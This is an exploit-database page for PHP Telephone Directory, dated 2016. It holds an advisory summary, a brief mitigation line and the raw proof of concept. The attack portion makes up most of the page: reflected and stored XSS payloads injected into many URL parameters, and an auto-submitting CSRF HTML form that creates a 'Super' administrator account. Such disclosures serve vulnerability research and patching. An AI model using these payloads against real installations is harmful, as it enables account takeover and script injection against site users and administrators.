header-logo
Suggest Exploit
vendor:
PHP Telephone Directory
by:
larrycompress
7,5
CVSS
HIGH
Reflected XSS and Stored XSS
79
CWE
Product Name: PHP Telephone Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2016

PHP Telephone Directory – Multiple Vulnerabilities

The PHP Telephone Directory is vulnerable to Reflected XSS and Stored XSS. In the public search, an attacker can inject malicious code into the 'key' parameter. In the administration web interface, an attacker can inject malicious code into the 'key' parameter. In the administration web directory interface, an attacker can inject malicious code into the 'pointcode', 'contacttitle', 'firstname', 'lastname', 'middlename', 'employeeID', 'otherID', 'phonenumber1', 'internalphonenumber', 'phonenumber2', 'phonenumber3', 'fax', 'mobilecell', 'email', 'alternateemail', 'chat', 'website', 'socialmedia1', 'socialmedia2', 'socialmedia3', 'contactposition', 'company', 'qualifications', 'buildingroom', 'address', 'city', 'suite', 'state', 'zip', 'country', 'notes', 'contacttype', 'contactstatus', 'contactgroup', 'contactgroup2', 'contactgroup3', 'contactgroup4', and 'contactgroup5' parameters.

Mitigation:

Input validation should be used to prevent XSS attacks. Sanitize user input and encode output to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2
# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip
---------------------------------------------------------------------------------

POC as follows :

# 0x00 Reflected XSS

---

1.In public search :

http://192.168.1.112/phptelephonedirectory/index.php?key=<svg/onload=alert(1)>

2.In administration web interface (need normal user login) :

http://192.168.1.112/phptelephonedirectory/administration.php?key=<svg/onload=alert(1)>

# 0x01 Stored XSS

---

1.In administration web directory interface (need normal user login) :

http://192.168.1.112/phptelephonedirectory/administration.php
?pageaction=newcontact
&subaction=submit
&id=1
&dtDOBDate=0000-00-00
&pointcode=<script>alert(1)/*
&contacttitle=*/</script>
&firstname=<script>alert(2)</script>
&lastname=<script>alert(3)</script>
&middlename=<script>alert(4)</script>
&DOBdateradio=usenew
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2015
&employeeID=<script>alert(5)/*
&otherID=*/</script>
&phonenumber1=<script>alert(6)</script>
&internalphonenumber=<script>alert(7)</script>
&phonenumber2=<script>alert(8)</script>
&phonenumber3=<script>alert(9)</script>
&fax=<script>alert(10)</script>
&mobilecell=<script>alert(11)</script>
&email=<script>alert(12)</script>
&alternateemail=<script>alert(13)</script>
&chat=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&contactposition=<script>alert(19)</script>
&company=<script>alert(20)</script>
&qualifications=<script>alert(21)</script>
&departmentnewedit=
&buildingroom=<script>alert(22)</script>
&address=<script>alert(23)</script>
&city=<script>alert(24)</script>
&suburb=<script>alert(25)</script>
&tdstate=<script>alert(26)</script>
&zippostcode=<script>alert(27)/*
&country=*/</script><script>alert(28)</script>
&description=<script>alert(29)</script>
&recordstatus=active

2.In administration web department interface (need normal user login) :

http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=</select><svg/onload=alert(1)><select>

# 0x02 CSRF (add Super user)

---

In http://192.168.1.103/csrf.html :

<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.112/phptelephonedirectory/administration.php" method="POST">
      <input name="pageaction" value="saveuser" type="hidden" />
      <input name="subaction" value="submit" type="hidden" />
      <input name="username" value="larry_csrf" type="hidden" />
      <input name="password" value="larry_csrf" type="hidden" />
      <input name="userfullname" value="larry_csrf" type="hidden" />
      <input name="accesslevel" value="Super" type="hidden" />
      <input name="userstatus" value="active" type="hidden" />
      <input name="mysubmit" value="submit" type="submit" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

* Thanks to Besim *

Navigation

Suggest Exploit

Services By CQR